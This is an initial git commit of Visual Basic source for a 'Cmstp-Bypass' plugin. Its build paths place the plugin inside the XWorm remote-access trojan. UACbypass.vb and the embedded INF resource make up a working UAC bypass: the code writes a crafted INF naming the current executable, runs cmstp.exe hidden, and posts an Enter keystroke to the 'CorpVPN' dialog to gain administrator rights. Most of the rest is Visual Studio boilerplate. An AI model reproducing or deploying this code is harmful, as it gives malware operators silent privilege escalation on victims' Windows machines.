initial commit

This commit is contained in:
i2p
2026-08-27 11:22:34 -06:00
commit 5983c713b1
2676 changed files with 529190 additions and 0 deletions
Binary file not shown.
+25
View File
@@ -0,0 +1,25 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.33027.164
MinimumVisualStudioVersion = 10.0.40219.1
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "Cmstp-Bypass", "Cmstp-Bypass\Cmstp-Bypass.vbproj", "{225D3722-7FEC-469B-8627-743978F298FC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{225D3722-7FEC-469B-8627-743978F298FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{225D3722-7FEC-469B-8627-743978F298FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{225D3722-7FEC-469B-8627-743978F298FC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{225D3722-7FEC-469B-8627-743978F298FC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {186454D4-6482-4D55-85D0-2400A6AA510F}
EndGlobalSection
EndGlobal
@@ -0,0 +1 @@
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\Cmstp-Bypass\\Cmstp-Bypass","ProjectFileName":"Cmstp-Bypass.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[{"SourceFile":"My Project\\AssemblyInfo.vb"},{"SourceFile":"My Project\\Application.Designer.vb"},{"SourceFile":"My Project\\Resources.Designer.vb"},{"SourceFile":"My Project\\Settings.Designer.vb"},{"SourceFile":"Plugin.vb"},{"SourceFile":"UACbypass.vb"},{"SourceFile":"obj\\Debug\\.NETFramework,Version=v4.8.AssemblyAttributes.vb"}],"References":[{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Core.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.DataSetExtensions.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Data.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""},{"Reference":"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\.NETFramework\\v4.8\\System.Xml.Linq.dll","ResolvedFrom":"","OriginalItemSpec":"","Name":"","EmbedInteropTypes":false,"CopyLocal":false,"IsProjectReference":false,"ProjectPath":""}],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\Cmstp-Bypass.dll","OutputItemRelativePath":"Cmstp-Bypass.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
@@ -0,0 +1,109 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{225D3722-7FEC-469B-8627-743978F298FC}</ProjectGuid>
<OutputType>Library</OutputType>
<RootNamespace>Cmstp_Bypass</RootNamespace>
<AssemblyName>Cmstp-Bypass</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>Windows</MyType>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<Deterministic>true</Deterministic>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>false</DebugSymbols>
<DebugType>none</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<OptionExplicit>On</OptionExplicit>
</PropertyGroup>
<PropertyGroup>
<OptionCompare>Binary</OptionCompare>
</PropertyGroup>
<PropertyGroup>
<OptionStrict>Off</OptionStrict>
</PropertyGroup>
<PropertyGroup>
<OptionInfer>On</OptionInfer>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Diagnostics" />
<Import Include="System.Linq" />
<Import Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<Compile Include="My Project\Resources.Designer.vb">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="My Project\Settings.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
<Compile Include="Plugin.vb" />
<Compile Include="UACbypass.vb" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="My Project\Resources.resx">
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
<CustomToolNamespace>My.Resources</CustomToolNamespace>
<SubType>Designer</SubType>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
<None Include="My Project\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<CustomToolNamespace>My</CustomToolNamespace>
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
</None>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
</Project>
@@ -0,0 +1,13 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>false</MySubMain>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<ApplicationType>1</ApplicationType>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,35 @@
Imports System
Imports System.Reflection
Imports System.Runtime.InteropServices
' General Information about an assembly is controlled through the following
' set of attributes. Change these attribute values to modify the information
' associated with an assembly.
' Review the values of the assembly attributes
<Assembly: AssemblyTitle("Cmstp-Bypass")>
<Assembly: AssemblyDescription("")>
<Assembly: AssemblyCompany("")>
<Assembly: AssemblyProduct("Cmstp-Bypass")>
<Assembly: AssemblyCopyright("Copyright © 2023")>
<Assembly: AssemblyTrademark("")>
<Assembly: ComVisible(False)>
'The following GUID is for the ID of the typelib if this project is exposed to COM
<Assembly: Guid("e576f2c2-3b86-4954-b67f-78ffc4babca0")>
' Version information for an assembly consists of the following four values:
'
' Major Version
' Minor Version
' Build Number
' Revision
'
' You can specify all the values or you can default the Build and Revision Numbers
' by using the '*' as shown below:
' <Assembly: AssemblyVersion("1.0.*")>
<Assembly: AssemblyVersion("1.0.0.0")>
<Assembly: AssemblyFileVersion("1.0.0.0")>
@@ -0,0 +1,89 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Imports System
Namespace My.Resources
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Cmstp_Bypass.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set
resourceCulture = value
End Set
End Property
'''<summary>
''' Looks up a localized string similar to [version]
'''Signature=$chicago$
'''AdvancedINF=2.5
'''
'''[DefaultInstall]
'''CustomDestination=CustInstDestSectionAllUsers
'''RunPreSetupCommands=RunPreSetupCommandsSection
'''
'''[RunPreSetupCommandsSection]
'''; Commands Here will be run Before Setup Begins to install
'''REPLACE_COMMAND_LINE
'''taskkill /im cmstp.exe /f
'''
'''[CustInstDestSectionAllUsers]
'''49000,49001=AllUSer_LDIDSection, 7
'''
'''[AllUSer_LDIDSection]
'''&quot;&quot;HKLM&quot;&quot;, &quot;&quot;SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE&quot;&quot;, &quot;&quot;ProfileInstallPath&quot;&quot;, &quot;&quot;%Unexpec [rest of string was truncated]&quot;;.
'''</summary>
Friend ReadOnly Property inf() As String
Get
Return ResourceManager.GetString("inf", resourceCulture)
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,144 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="inf" xml:space="preserve">
<value>[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /im cmstp.exe /f
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""</value>
</data>
</root>
@@ -0,0 +1,73 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Partial Friend NotInheritable Class MySettings
Inherits Global.System.Configuration.ApplicationSettingsBase
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
Private Shared addedHandler As Boolean
Private Shared addedHandlerLockObject As New Object
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
If My.Application.SaveMySettingsOnExit Then
My.Settings.Save()
End If
End Sub
#End If
#End Region
Public Shared ReadOnly Property [Default]() As MySettings
Get
#If _MyType = "WindowsForms" Then
If Not addedHandler Then
SyncLock addedHandlerLockObject
If Not addedHandler Then
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
addedHandler = True
End If
End SyncLock
End If
#End If
Return defaultInstance
End Get
End Property
End Class
End Namespace
Namespace My
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
Friend Module MySettingsProperty
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
Friend ReadOnly Property Settings() As Global.Cmstp_Bypass.My.MySettings
Get
Return Global.Cmstp_Bypass.My.MySettings.Default
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,7 @@
<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
<Profiles>
<Profile Name="(Default)" />
</Profiles>
<Settings />
</SettingsFile>
@@ -0,0 +1,27 @@
Imports System.Security.Principal
Public Class Plugin
Public Shared Function UACFunc(ByVal Method As Integer)
Try
If Not AdminCheck() Then
Select Case Method
Case 0
UACbypass.Execute() : Environment.Exit(0)
End Select
Else
Return "UAC Permissions Already!"
End If
Catch ex As Exception
Return (ex.Message)
End Try
End Function
Public Shared Function AdminCheck() As Boolean
Try
Return New WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)
Catch ex As Exception
Return False
End Try
End Function
End Class
@@ -0,0 +1,53 @@
Imports System.IO
Imports System.Runtime.InteropServices
Imports System.Text
Imports System.Threading
Public Class UACbypass
Public Declare Ansi Function PostMessageW Lib "user32.dll" (ByVal hWnd As IntPtr, ByVal Msg As UInteger, ByVal wParam As Integer, ByVal lParam As Integer) As <MarshalAs(UnmanagedType.Bool)> Boolean
Private Declare Auto Function FindWindowEx Lib "user32" (ByVal parentHandle As Integer, ByVal childAfter As Integer, <MarshalAs(UnmanagedType.VBByRefStr)> ByRef lclassName As String, <MarshalAs(UnmanagedType.VBByRefStr)> ByRef windowTitle As String) As Integer
Public Shared Function SetInfFile(ByVal CommandToExecute As String) As String
Dim value As String = Path.GetRandomFileName().Split(New Char() {Convert.ToChar(".")})(0)
Dim value2 As String = Interaction.Environ("WinDir") & "\temp"
Dim stringBuilder As StringBuilder = New StringBuilder()
stringBuilder.Append(value2)
stringBuilder.Append("\")
stringBuilder.Append(value)
stringBuilder.Append(".inf")
Dim stringBuilder2 As StringBuilder = New StringBuilder(My.Resources.inf)
stringBuilder2.Replace("REPLACE_COMMAND_LINE", CommandToExecute)
File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString())
Return stringBuilder.ToString()
End Function
Public Shared Function Execute() As Boolean
Dim flag As Boolean = Not File.Exists(BinaryPath)
Dim flag2 As Boolean = flag
Dim result As Boolean
If flag2 Then
result = False
Else
Dim stringBuilder As StringBuilder = New StringBuilder()
stringBuilder.Append(SetInfFile(Process.GetCurrentProcess.MainModule.FileName))
Dim StartInfo As New ProcessStartInfo
StartInfo.FileName = BinaryPath
StartInfo.WindowStyle = ProcessWindowStyle.Hidden
StartInfo.Arguments = "/au " & stringBuilder.ToString()
Process.Start(StartInfo)
Thread.Sleep(5000)
Dim parentHandle As Integer = 0
Dim childAfter As Integer = 0
Dim text As String = Nothing
Dim text2 As String = """CorpVPN"""
Dim value As Integer = FindWindowEx(parentHandle, childAfter, text, text2)
PostMessageW(CType(value, IntPtr), 256UI, 13, 0)
result = True
End If
Return result
End Function
Public Shared BinaryPath As String = Interaction.Environ("WinDir") & "\system32\cmstp.exe"
End Class
@@ -0,0 +1,26 @@
<?xml version="1.0"?>
<doc>
<assembly>
<name>
Cmstp-Bypass
</name>
</assembly>
<members>
<member name="T:Cmstp_Bypass.My.Resources.Resources">
<summary>
A strongly-typed resource class, for looking up localized strings, etc.
</summary>
</member>
<member name="P:Cmstp_Bypass.My.Resources.Resources.ResourceManager">
<summary>
Returns the cached ResourceManager instance used by this class.
</summary>
</member>
<member name="P:Cmstp_Bypass.My.Resources.Resources.Culture">
<summary>
Overrides the current thread's CurrentUICulture property for all
resource lookups using this strongly typed resource class.
</summary>
</member>
</members>
</doc>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1 @@
380c555e485d91c669e20b240c27a74bdfafab2762383c73bcd1d67657cbd3f6
@@ -0,0 +1,119 @@
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\bin\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\bin\Debug\Cmstp-Bypass.pdb
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\bin\Debug\Cmstp-Bypass.xml
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.xml
C:\Users\XCoder\source\repos\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.pdb
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.0\XWorm V5.0\XWorm V5.0\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.1\XWorm V5.1\XWorm V5.1\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Dark Worm\bin\Debug\Plugins\Cmstp-Bypass.dll
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\Cmstp-Bypass\Cmstp-Bypass\obj\Debug\Cmstp_Bypass.Resources.resources
